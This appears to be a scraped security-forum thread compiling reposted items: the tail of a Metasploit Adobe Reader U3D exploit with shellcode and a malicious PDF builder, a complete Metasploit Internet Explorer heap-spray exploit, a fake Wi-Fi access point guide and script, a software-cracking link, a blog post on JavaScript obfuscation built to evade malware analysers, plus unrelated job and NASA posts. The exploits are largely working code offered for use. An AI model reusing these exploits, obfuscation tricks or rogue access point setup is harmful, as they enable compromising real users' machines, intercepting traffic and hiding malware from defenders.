"\x26\x10\x06\x6f\x3a\x40\xae\x36\x6a\x43\x60\xdf\xcb\xef\x8c\x38\xca\x04\x92\x79\x4b\x79"+ "\xe9\x42\xbd\x2b\xb9\x5b\x86\x60\x65\xa4\x75\x01\x19\xda\xcf\x6a\xf7\x2a\x77\x3c\xde\xf1"+ "\x11\x75\x33\xd3\x94\x74\x4a\x14\x73\x4b\x18\xa1\x66\xc2\x0f\xde\x3d\xed\x19\xd4\x32\x2e"+ "\xb6\x11\xf2\xc6\x2f\x13\x62\xb9\xe5\xe1\x03\x8b\xb5\x1c\x23\x9f\x80\x03\x75\xb6\x26\xd3"+ "\x1c\x16\x5f\x9b\x3c\xea\x62\x10\xe1\xb1\x00\x00\x00\x00" # build the modifier chain chain_data = "" chain_data << mc_name chain_data << [0].pack('V') # type (node modifier) chain_data << [0].pack('V') # attributes (no bounding info) chain_data << u3d_pad(chain_data) chain_data << [0x5].pack('V') # number of modifiers chain_data << nodemod_decl #modifier_chain = [0xffffff14,chain_data.length,0].pack('VVV') # chain_data was 0x17c bytes modifier_chain = [0xffffff14,0x17c,0].pack('VVV') modifier_chain << chain_data data = "" data << hdr data << modifier_chain data end def RandomNonASCIIString(count) result = "" count.times do result << (rand(128) + 128).chr end result end def ioDef(id) "%d 0 obj\n" % id end def ioRef(id) "%d 0 R" % id end def ASCIIHexWhitespaceEncode(str) result = "" whitespace = "" str.each_byte do |b| result << whitespace << "%02x" % b whitespace = " " * (rand(3) + 1) end result << ">" end def make_pdf(u3d_stream, xml, js_doc) xref = [] eol = "\x0a" obj_end = "" << eol << "endobj" << eol # the header pdf = "%PDF-1.7" << eol # filename/comment pdf << "%" << RandomNonASCIIString(4) << eol email = rand_text_alpha(3) + "@" + rand_text_alpha(4) + ".com" site = rand_text_alpha(5) + ".com" xref << pdf.length pdf << ioDef(1) pdf << "<</Author (Fo)/email (#{email})/web (site)>>" pdf << obj_end compressed_xml = Zlib::Deflate.deflate(xml) xref << pdf.length pdf << ioDef(2) pdf << "<</Length " << compressed_xml.length.to_s << " /Filter /FlateDecode>>" << eol pdf << "stream" << eol pdf << compressed_xml << eol pdf << "endstream" pdf << obj_end xref << pdf.length pdf << ioDef(3) pdf << "<</XFA " << ioRef(2) << ">>" pdf << obj_end xref << pdf.length pdf << ioDef(4) pdf << "<</Type/Catalog/Outlines " << ioRef(5) pdf << " /Pages " << ioRef(6) pdf << " /OpenAction " << ioRef(14) pdf << " /AcroForm " << ioRef(3) pdf << ">>" pdf << obj_end xref << pdf.length pdf << ioDef(5) << "<</Type/Outlines/Count 0>>" pdf << obj_end xref << pdf.length pdf << ioDef(6) pdf << "<</Type/Pages/Count 3/Kids [%s %s %s]>>" % [ioRef(13), ioRef(9), ioRef(12)] pdf << obj_end data = "\x78\xda\xd3\x70\x4c\x04\x02\x4d\x85\x90\x2c\x00\x0f\xd3\x02\xf5" compressed_data = Zlib::Deflate.deflate(data) xref << pdf.length pdf << ioDef(7) pdf << "<</Length %s /Filter /FlateDecode>>" %compressed_data.length.to_s << eol pdf << "stream" << eol pdf << compressed_data << eol pdf << "endstream" pdf << obj_end xref << pdf.length pdf << ioDef(8) pdf << "<</ProcSet [/PDF]>>" pdf << obj_end xref << pdf.length pdf << ioDef(9) pdf << "<</Type/Page/Parent %s/MediaBox [0 0 640 480]/Contents %s/Resources %s>>" % [ioRef(6), ioRef(7), ioRef(8)] pdf << obj_end compressed_u3d = Zlib::Deflate::deflate(u3d_stream) xref << pdf.length pdf << ioDef(10) pdf << "<</Type/3D/Subtype/U3D/Length %s /Filter/FlateDecode>>" %compressed_u3d.length.to_s << eol pdf << "stream" << eol pdf << compressed_u3d << eol pdf << "endstream" pdf << obj_end xref << pdf.length pdf << ioDef(11) pdf << "<</Type/Annot/Subtype/3D/Contents (#{rand_text_alpha(4)})/3DI false/3DA <</A/PO/DIS/I>>" pdf << "/Rect [0 0 640 480]/3DD %s /F 7>>" %ioRef(10) pdf << obj_end xref << pdf.length pdf << ioDef(12) pdf << "<</Type/Page/Parent %s /MediaBox [0 0 640 480]/Contents %s /Resources %s /Annots [%s]>>" % [ioRef(6), ioRef(7), ioRef(8), ioRef(11)] pdf << obj_end xref << pdf.length pdf << ioDef(13) pdf << "<</Type/Page/Parent %s /MediaBox [0 0 640 480]/Contents %s /Resources %s>>" % [ioRef(6), ioRef(7), ioRef(8)] pdf << obj_end xref << pdf.length pdf << ioDef(14) pdf << "<</S/JavaScript/JS %s>>" %ioRef(15) pdf << obj_end compressed_js = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_doc)) xref << pdf.length pdf << ioDef(15) pdf << "<</Length " << compressed_js.length.to_s << " /Filter [/FlateDecode/ASCIIHexDecode]>>" pdf << "stream" << eol pdf << compressed_js << eol pdf << "endstream" pdf << obj_end # xrefs xrefPosition = pdf.length pdf << "xref" << eol pdf << "0 %d" % (xref.length + 1) << eol pdf << "0000000000 65535 f" << eol xref.each do |index| pdf << "%010d 00000 n" % index << eol end # trailer pdf << "trailer" << eol pdf << "<</Size %d/Root " % (xref.length + 1) << ioRef(4) << ">>" << eol pdf << "startxref" << eol pdf << xrefPosition.to_s() << eol pdf << "%%EOF" << eol end end Sursa: Adobe Reader U3D Memory Corruption Vulnerability

[h=1]Microsoft Windows Assembly Execution Vulnerability MS12-005[/h] # Exploit Title: MS12-005 : Microsoft Windows Assembly Execution Vulnerability # Date: 1/14/2012 # Author: Byoungyoung Lee, http://exploitshop.wordpress.com # Version: Windows 7 32bit, fully patched until Jan 2012 # Tested on: Windows 7 32bit # CVE : CVE-2012-0013 PoC: http://www.exploit-db.com/sploits/18372.docm Open the document file, then allow the macro execution. This will execute python script (python interpreters are required). DEMO : http://www.youtube.com/watch?v=Odi6HiqzmL8&feature=youtu.be&hd=1 Sursa: Microsoft Windows Assembly Execution Vulnerability MS12-005

[h=3]keygen tutorial and challenge[/h][h=2]Saturday, January 14, 2012[/h] Keygen'ing as a style of cracking requires you to really know and understand how the protection works. it also requires no modification of the original application, so is a very pure way of cracking. zAWS!, who posted a keygen for lesson 0's crackme0b, sent me this challenge to share: KeygenMe#1.rar But before you start, you may want to see his/her keygen tutorial. it comes with the original apk and has videos showing the process: Android Keygening Tutorial-zAWS!.rar Posted by lohan+ Sursa: android cracking: keygen tutorial and challenge

[h=4]Nexpose Vulnerability Scanner Using Metasploit.[/h] Description: This video shows the usage of nexpose vulnerability scanner using metasploit. Sursa: Nexpose Vulnerability Scanner Using Metasploit.

Setup a Fake Access Point With BackTrack5 Posted Nov 6 2011 by NightRanger Recently I needed to setup a fake access point for a presentation, I fired up my Backtrack5 VM, Connected my Alfa AWUS036H USB adapter and started to configure the Fake AP. There are a lot of Tutorials and Scripts for setting up a Fake AP, The “Gerix” tool also have an option to auto set a Fake AP (for some reason this tool never worked for me). I started to setup my fake AP and had run into some trouble for a strange reason. I decided to put my experience here hopefully you’ll find it useful. Started by putting my Wlan interface in monitor mode root@Blackbox:~/fakeap# airmon-ng start wlan1 Found 1 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 1558 dhclient Interface Chipset Driver wlan1 Realtek RTL8187L rtl8187 - [phy1]SIOCSIFFLAGS: Unknown error 132 (monitor mode enabled on mon0) I noticed the following error: “Unknown error 132? Tried using airodump-ng to see what happens… root@Blackbox:~/fakeap# airodump-ng mon0 ioctl(SIOCSIFFLAGS) failed: Unknown error 132 Got the same error. The solution was simply to unload the RTL8187 and Load the R8187 driver instead as follows: root@Blackbox:~/fakeap# rmmod rtl8187 root@Blackbox:~/fakeap# modprobe r8187 Tried putting wlan In monitor mode again root@Blackbox:~/fakeap# airmon-ng start wlan1 Found 1 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 1558 dhclient Interface Chipset Driver wlan1 RTL8187 r8187 (monitor mode enabled) Well, that fixed the problem root@Blackbox:~/fakeap# iwconfig lo no wireless extensions. eth3 no wireless extensions. wlan1 802.11b/g Mode:Monitor Channel=10 Bit Rate=11 Mb/s Tx-Power=5 dBm Retry:on Fragment thr:off Link Quality=0/100 Signal level=50 dBm Noise level=-156 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Now we can proceed to the fake ap setup process 1. Install a DHCP Server apt-get install dhcp3-server 2. Edit “/etc/dhcp3/dhcpd.conf” as follows (You can change ip address, pool and dns server as needed): ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; authoritative; subnet 10.0.0.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 10.0.0.255; option routers 10.0.0.254; option domain-name-servers 8.8.8.8; range 10.0.0.1 10.0.0.140; } 3. Put your wlan in monitor mode airmon-ng start wlan1 4. Start airbase-ng, you will need to specify the AP SSID and channel number airbase-ng -e FreeWifi -c 11 -v wlan1 & 5. Airbase will create a new adapter “at0? you will need to enable it and assign it with an ip address and subnet mask, the ip address you assign to this interface will be the default gateway that you specified in the dhcpd.conf file. ifconfig at0 up ifconfig at0 10.0.0.254 netmask 255.255.255.0 6. Add a route route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 7. Setup ip tables iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT • Eth3 is my external interface which is connected to the internet change it to whatever yours is iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE 8. Clear dhcp leases echo > '/var/lib/dhcp3/dhcpd.leases' 9. Create a symlink to dhcpd.pid (skipping this may cause an error when starting dhcp server) ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid 10. Start the DHCP server dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 & 11. Don’t forget to enable IP forwarding echo "1" > /proc/sys/net/ipv4/ip_forward That’s All Folks! I have created a simple bash script to automate this process you will just need to change it to suit your configuration. #!/bin/bash echo "Killing Airbase-ng..." pkill airbase-ng sleep 2; echo "Killing DHCP..." pkill dhcpd3 sleep 5; echo "Putting Wlan In Monitor Mode..." airmon-ng stop wlan1 # Change to your wlan interface sleep 5; airmon-ng start wlan1 # Change to your wlan interface sleep 5; echo "Starting Fake AP..." airbase-ng -e FreeWifi -c 11 -v wlan1 & # Change essid, channel and interface sleep 5; ifconfig at0 up ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 sleep 5; iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE # Change eth3 to your internet facing interface echo > '/var/lib/dhcp3/dhcpd.leases' ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 & sleep 5; echo Sursa: http://exploit.co.il/hacking/set-fake-access-point-backtrack5/

[h=1]SpiderLabs / SQLol[/h] SQLol Released at Austin Hackers Association meeting 0x3f Daniel Crowley <dcrowley@trustwave.com> http://www.trustwave.com INTRODUCTION ============ ***WARNING: SQLol IS INTENTIONALLY VULNERABLE. DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT EXPOSE SQLol IN AN UNTRUSTED ENVIRONMENT.*** SQLol is a configurable SQL injection testbed. SQLol allows you to exploit SQL injection flaws, but furthermore allows a large amount of control over the manifestation of the flaw. To better understand why SQLol exists, please read the sonnet below: I humbly posit that the current state (With much respect to work which does precede) Of test-beds made with vulns to demonstrate Is lacking some in flexibility. Two options are presented present-day, As far as when one deals with S-Q-L: A blind injection (bool or time delay) And UNION statement hax (oh gee, how swell…) Imagine we could choose how queries read And how our input sanitizes, oh! How nimble and specific we could be To recreate our ‘sploit scenarios. And thus is S-Q-L-O-L conceived: That we can study how to pwn DBs. Options: Type of query Location within query Type and level of sanitization Level of query output Verbosity of error messages Visibility of query Injection string entry point Other cool things: Reset button Challenges Support for multiple database systems REQUIREMENTS ============ PHP 5.x Web server Database server (MySQL, PostgreSQL and SQLite have been tested, others may work) ADODB library (included) USAGE ===== Place the SQLol source files on your Web server and open in a Web browser. Modify the configuration file #sqlol_directory#/includes/database.config.php to point to your installed database server. Use the resetbutton.php script to write the SQLol database, then start playing! COPYRIGHT ========= SQLol - A configurable SQL injection testbed Daniel "unicornFurnace" Crowley Copyright (C) 2012 Trustwave Holdings, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/> A configurable SQL injection test-bed — Read more https://www.trustwave.com/spiderLabs.php Sursa: https://github.com/SpiderLabs/SQLol

[h=2]Obfuscated JavaScript 2.0 - Building an encoder[/h] JavaScript is a wonderful language full of tricks, power and the element of confusion. In this day and age it is likely that most people handling PDF, JAVA, Flash or browser-based exploits has either seen, reversed or been owned due to JavaScript. To this day attackers continue to find clever new ways of hiding their exploit or making the reversing process a nightmare, but not many have turned to the web 2.0 features. M86 wrote up an entry a last week detailing some malware that used AJAX to fetch a portion of its shellcode. Oddly enough, over the winter break, I decided it would be fun to write my own JavaScript encoder with the intention of making it a royal pain to reverse. My encoder also used AJAX, but in a nastier way, so I felt now was the time to do a write up on it. That and I am in Miami this week attending Infiltrate where there is nothing but offensive events happening all around me, so this is my attempt to fit in. This post won't cover the creation of the encoder as that in itself could take a couple posts alone. Instead, focus will be placed on some of the techniques I used and how the overall output product is generated. Comparisons will also be done between my output versus what is currently being seen in the wild. Routines The routines used in my encoder are similar to what has already been put out by attackers, but with some more technical aspects to ensure the code is not easily reversed. The following describes the flow of transformation: Code to be encoded is taken in Encoder sets and splits are generated to be used later in the routines Code is ran through a function that converts ASCII to its number form Each number is than mapped to a random alpha key resulting in a single character Each character is mapped against the encoder set which results in a long string made up of 3 unique characters Alpha key is stored server side and mapped to a seed token Round one decryption routine is built taking in all variables listed above into account (additional data for round two decryption routine is stored local to the class) Output generated from routine one is fed to routine two Steps 1-5 are ran again Round two decryption routine is built taking pieces of data from round one Output Code and Results The output code is large, so here is a screenshot capturing the bulk portion of the code: As you can see, it clearly looks like something malicious is happening here, but without reversing you are left guessing what exploit could be used in the delivery. If you want a live example, visit here and if you just want the output sample then see here. After running my code through Wepawet and Jsunpack a few times, I was able to tune the script such that it would be flagged as benign. This is mostly due to the fact that jQuery is required to fully decode the payload and neither of these engines seem to account for that. In the example I decided not to output the original code that I fed to the encoder, so if you want to have a shot at reversing it, go ahead and email your answer. There won't be any prizes for solving the puzzle, but it could be good practice. Variable Names Almost all obfuscated JS makes a point of creating random variable names. At first glance it is difficult to identify what is going on, but after doing several finds and replaces, you have a pretty good idea where to hook so you get the output result. Instead of doing a 100% random sequence, I opted for something a bit more annoying. All my variable names are derived off a single string of one letter that has randomly been camel cased. Each variable is essentially carved from the core string at random lengths and offsets. This results in variable names that are sometimes contained within other variable names. To illustrate what I mean, take a look at this example: As you can see, no longer can you simply find and replace every instance of a variable. In fact, you can almost never do that with any one variable without first checking where else it occurs. Not only is this effective in making the code difficult to read, but it also still retains the same effect that existing code achieves. Invisible Payloads Within the ASCII character set are numerous characters that print as blanks. Unfortunately, only four of these characters are printable in a web environment. These characters are spaces, horizontal tabs, vertical tabs and new pages. It is ideal to have one of these four characters serve as a spacer as it makes identifying where separation begins and ends on the encoded output. This leaves three characters left that can be used to encode our input code. Fortunately, if we do not take case into account, then we have 3 to the 9th power combinations (27) allowing us to represent the entire lowercase alphabet in invisible characters (this process is used in step 5 of the flow). Initially all encoded output code was done using the three letters, but that resulted in the same pattern every time. At first this would be a pain to reverse, but once you knew what you were dealing with, it wouldn't be hard at all. To combat against this issue, I decided to randomly select the spacer from the four values, and included the remaining three in an array of "encoding characters". The output of this would sometimes result in a 100% visible encoded output, but other times it results in half-way visible or three-quarters visible output making it difficult to identify which invisible character is being used for what. Below is a small portion of the output code after being encoded: Preemptive Hooks I wrote about JavaScript Hookers a few weeks ago and it dawned on me that these did not exist in malicious output. If I were hooking certain functions to reverse a payload, then why couldn't an attacker do the same? Following the same concept as a reverse engineer, I hooked "eval", "alert" and reassigned "console" and "document" before clobbering them. Essentially what this means is that if you try and use "console.log" or "alert" when reversing this code, it will send you into an infinite loop. Also, because I reassign certain functionality to random variables, you need to also keep those preserved otherwise you will break the code later when they get used. To combat against this you would need to inject JS after my hooks and redefine the functions back to their original state. I am not certain how this would be done, but if in the event someone managed to do it, I decided to throw in another problem. Some hooks are defined in one round and then later used in the second round decoder meaning you can't just redefine everything back to how it was. Furthermore, on the second round, I clobber all global functions listed above again therefore forcing the user to inject another override. AJAX Required As part of the decoding routine, AJAX is used to pass data back to the server to get the proper return value. This is based on the alpha key generated and stored during the encoding process. Since this key is random, you are out of luck if you don't have access to the server unless of course you want to brute force the values. The AJAX portion of the encoding is only present in round two of the decoding routine, so at first glance, there is no mention of any AJAX. If you copy and paste the script into a reversing environment, you will be able to decode the first round without issue, but the second round will leave you stuck. The nature of AJAX forces you to hardcode a URL that is within the same domain as your hosted code. This is not really an issue as we can control this value server-side, but to pull the correct alpha key, we need to pass a unique seed token. Someone reversing the code could copy the URL and parameters to just get the values and subvert the whole process. To combat against this, the amount of iterations is calculated and stored with the seed token and alpha key mapping. This means that the payload is literally only good to run for one and one time only. After the sequence has ran and talked with the sever for its set call limit, it starts spewing random values causing the decoding to fail. Exception Clauses Try/except clauses have been known to cause problems for automated analysis engines, but that has been fixed to some extent. For the AJAX portion of the code to work above, I include jQuery (it is small and ubiquitous) which means it uses its own syntax for certain actions. Analysis engines are currently not smart enough to include these libraries and as a result, we can use this against them in our try/except clauses. If we wrap out entire code base and routines in try/except clauses where the try attempts to do something with jQuery, then we know the engine will fail and therefore hit the exception catch. This simple, yet effective technique is used in both rounds of the decoding process. It should be noted that in some cases the catch portion of the code returns actual data that can be used within the overall decoding process. This means that the code won't break or cease to function just because the exception is hit. In other words, a good exception is not wasted and instead is used to throw the analyst off. If you are not carful, you could easily miss that fact that the catch is caught in the round two decryption resulting in random characters being generated for the output string. Encoded Code/Shellcode Detour One of the less technical or amusing pieces of the code is what I call the "detour data". This is just essentially random code made to look interesting so the user spends time saving, reversing or trying to make sense of it. There is nothing stopping it from getting used later on, but for now it is not and just takes up space. Since it is random, it too changes giving it the appearance of being useful. Comment Bombs When reversing obfuscated JS, it is normal to remove it from the live environment and throw it into a safe place where it can be ran. The first tool that comes to mind for dealing with this sort of problem is Malzilla. It does a great job making ugly code readable and assisting in the process of reversing. Unfortunately the code used to "beautify" the JS is flawed to some extent. If I throw in some specially made comments, when you hit the cleanup, it completely sprays the comment data into the code therefore breaking it. This is by no means advanced or technical, but can be confusing if done near a single instruction if/else statement. Tailored Output The code currently generated by the encoder does not account for the browser version being used. Keep in mind that if you know the browser or have a reasonable idea of what version it is, then there are certain things you can do to make life hell or tailor your output code to make it less bulky. As an example, think of Firefox and the Firebug extension. Firebug is great, almost too great for doing live analysis or code changes. If we can detect the presence of Firebug being on, then why not kill ourselves to avoid being analyzed. The current output will not kill itself if it sense Firebug, but it will clear the console to avoid all the AJAX calls from being seen. This is just a small example, but it helps illustrate what more could be done. Future Improvements One and Done Following with the same trend on limiting AJAX calls, there is nothing stopping an attacker form generating a random directory to hold a randomly named JS file that deletes itself after being ran once. Imagine a user gets compromised and you now want to look to see what was used only to find that file no longer exists on the server and the payload is useless without the proper decoding handler. I have toyed around with this, but do not intend on sharing it at this time. Secure Chatting HTTP GET requests are used when making the AJAX call back to the server. This could easily be changed to HTTPS POST requests therefore hiding what was sent and killing any hope of successfully understanding what was going on between the client and server. Enabling such a setup is as simple as changing the web server configuration and AJAX call within the code. Conclusions Once again, this example goes to show that attackers can do a lot more to make life hell. The fact that they don't is a huge relief to us, but given we are already starting to see AJAX used to fetch shellcode, I can say with certainty that these sort of techniques and more are going to show up in malicious code soon. If we start working against them now, it will be easier when they are being used for evil. At this point in time I am not releasing the encoder as that would spoil the challenge if someone wanted to accept it, but if you are interested in knowing more or discussing the process, email me. Sursa: Obfuscated JavaScript 2.0 - Building an encoder - 9b+

[h=1]CNN Inside Anonymous[/h] http://www.youtube.com/watch?v=NDhEHkqGbxA Uploaded by LegionIsUnity on Jan 14, 2012 CNN reporter Amber Lyon (twitter: @AmberLyon) takes an inside look at the hactivist group "Anonymous". Original air date: Jan 14, 2012 ================================================== Download: CNN Inside Anonymous.wmv Bla bla...

Da, eu vad destul de des Linux pe niste Flash-uri de 64 MB si procesoare ARM.

Introduction to Network Security Toolkit (NST) The Network Security Toolkit (NST) is a ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. The majority of tools published in the article: Top 100 Security Tools by INSECURE.ORG are available in the toolkit. Some of the tools available in this live are: Ntop, wireshark, nmap with the vizualization tool ZenMap and kismet. Many tasks that can be performed within NST are available through a web interface called NST WUI. Among the tools that can be used through this interface are nmap with the vizualization tool ZenMap, ntop, a session manager for VNC, a minicom-based terminal server, serial port monitoring, and WPA PSK management. You can read some of my articles about Nmap and Ntop following the links, for Nmap you got also Zenmap. Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database. On NST are also available Nagios and Argus, 2 software that can be used for network monitoring, you can check the status of various services, like web server, pop/imap mails erver or other services that in general you can test directly with a network connection. Another feature nice, and really “scenic” is that NST includes visualization of ntop, wireshark, traceroute and kismet data by geocoding the host addresses and displaying them via Google Earth. For this NST use a custom tool: nstgeolocate — Geolocate hosts obtained from an ‘ntop’ session or Geolocate IPv4 Address conversations from a network packet capture file on a Mercator World Map projection or Global imagery. There is also a browser-based packet capture and protocol analysis system capable of monitoring up to four network interfaces using Wireshark, as well as a Snort-based intrusion detection system with a “collector” backend that stores incidents in a MySQL database. For web developers, there is also a JavaScript console with a built-in object library with functions that aid the development of dynamic web pages. A great guide on what is available on the live distro and how to use each tools it’s present of the official wiki Conclusions This live CD it’s really filled with security tools and utility, so it could be really useful to set up in few minutes a location where you can do a security audit of a network or some hosts. It’s also really interesting the option to put it on a virtual machine, on the wiki there is a good how to on how to put NST on Virtualbox. So in few words: try and use it for your security audit, you’ll be satisfied for sure. Sursa: http://linuxaria.com/article/introduction-to-network-security-toolkit-nst?lang=en

Exploiting embedded systems Overview: - Embedded systems basics - Real Time OS - The ARM architecture - The JTAG interface - The UART interface .............................. Download: http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Jack.pdf E o prezentare, dar se pot observa conceptele.

Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability', 'Description' => %q{ This bug is triggered when the browser handles a JavaScript 'onLoad' handler in conjunction with an improperly initialized 'window()' JavaScript function. This exploit results in a call to an address lower than the heap. The javascript prompt() places our shellcode near where the call operand points to. We call prompt() multiple times in separate iframes to place our return address. We hide the prompts in a popup window behind the main window. We spray the heap a second time with our shellcode and point the return address to the heap. I use a fairly high address to make this exploit more reliable. IE will crash when the exploit completes. Also, please note that Internet Explorer must allow popups in order to continue exploitation. }, 'License' => MSF_LICENSE, 'Author' => [ 'Benjamin Tobias Franz', # Discovery 'Stuart Pearson', # Proof of Concept 'Sam Sharps' # Metasploit port ], 'References' => [ ['MSB', 'MS05-054'], ['CVE', '2005-1790'], ['OSVDB', '17094'], ['URL', 'http://www.securityfocus.com/bid/13799/info'], ['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'Compat' => { 'ConnectionType' => '-find', }, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Internet Explorer 6 on Windows XP', { 'iframes' => 4 } ], [ 'Internet Explorer 6 Windows 2000', { 'iframes' => 8 } ], ], 'DisclosureDate' => 'Nov 21 2005', 'DefaultTarget' => 0)) end def exploit @var_redir = rand_text_alpha(rand(100)+1) super end def auto_target(cli, request) mytarget = nil agent = request.headers['User-Agent'] print_status("Checking user agent: #{agent}") if (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.1/) mytarget = targets[0] # IE6 on XP elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/) mytarget = targets[1] # IE6 on 2000 else print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") end mytarget end def on_request_uri(cli, request) mytarget = auto_target(cli, request) var_title = rand_text_alpha(rand(100) + 1) func_main = rand_text_alpha(rand(100) + 1) heapspray = ::Rex::Exploitation::JSObfu.new %Q| function heapspray() { shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}'); var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0,slackspace); var block = bigblock.substring(0,bigblock.length - slackspace); while (block.length + slackspace < 0x40000) block = block + block + fillblock; var memory = new Array(); for (i = 0; i < 250; i++){ memory[i] = block + shellcode } var ret = ""; var fillmem = ""; for (i = 0; i < 500; i++) ret += unescape("%u0F0F%u0F0F"); for (i = 0; i < 200; i++) fillmem += ret; prompt(fillmem, ""); } | heapspray.obfuscate nofunc = ::Rex::Exploitation::JSObfu.new %Q| if (document.location.href.indexOf("#{@var_redir}") == -1) { var counter = 0; top.consoleRef = open('','BlankWindow', 'width=100,height=100' +',menubar=0' +',toolbar=1' +',status=0' +',scrollbars=0' +',left=1' +',top=1' +',resizable=1') self.focus() for (counter = 0; counter < #{mytarget['iframes']}; counter++) { top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>'); } document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">"); } else { #{heapspray.sym('heapspray')}(); } | nofunc.obfuscate main = %Q| function #{func_main}() { document.write("<TITLE>#{var_title}</TITLE>"); document.write("<body onload=window();>"); window.location.reload(); } | html = %Q| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <html> <head> <meta http-equiv="Content-Language" content="en-gb"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <script> #{nofunc} #{heapspray} #{main} </script> </head> <body> </body> </html> | print_status("Sending #{self.name} to client #{cli.peerhost}") # Transmit the compressed response to the client send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' }) # Handle the payload handler(cli) end end Sursa: Microsoft Internet Explorer JavaScript OnLoad Handler Code Execution | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

[h=1]OpenVSP[/h] NASA Open Source Parametric Geometry OpenVSP is a parametric aircraft geometry tool. OpenVSP allows the user to create a 3D model of an aircraft defined by common engineering parameters. This model can be processed into formats suitable for engineering analysis. The predecessors to OpenVSP have been developed by J.R. Gloudemans and others for NASA since the early 1990's. On January 10 2012, OpenVSP was released as an open source project under the NASA Open Source Agreement (NOSA) version 1.3. We are still in the process of setting up all of the things which allow an open source project to work. In the meantime, get OpenVSP for yourself from the links below. OpenVSP 2.0 for Windows OpenVSP 2.0 for Mac OS X OpenVSP 2.0 Community Edition Source Code Interesanta ideea. Si ce cod sursa "urat": lcsfit_(&c__201, xt, yt, &c_true, "B", &c__1, &xtp, &ym, &ym, (ftnlen)1); xo = xt[0]; xl[0] = xt[199]; tr = ym * 2.f / (xl[0] - xo); rat = toc / tr; sf = rat; if (toc > e && (r__1 = rat - 1.f, dabs(r__1)) > 1e-4f && it <= 10) { goto L400; } Sursa: OpenVSP

Daca esti bun nu conteaza domeniul, o sa iti gasesti de munca. E mai greu la inceput, dar usor-usor o sa gasesti ceva frumos, care sa iti placa si care sa iti aduca venituri substantiale. Pe partea de PHP se cauta, dar sunt multi si trebuie sa fii bun, Java inca e cautat, dar nu stiu cat timp o sa mai fie, posturi de administrator nu sunt foarte multe, dar cred ca se castiga bine, iar C++ cred intotdeauna va fi cautat. Vezi si tu pe bestjobs/ejobs ce se cauta, cauta in functie de experienta ceruta si vezi ce criterii se cer la fiecare. O sa "pierzi" doua zile cu asta, dar apoi vei stii exact ce ai de facut.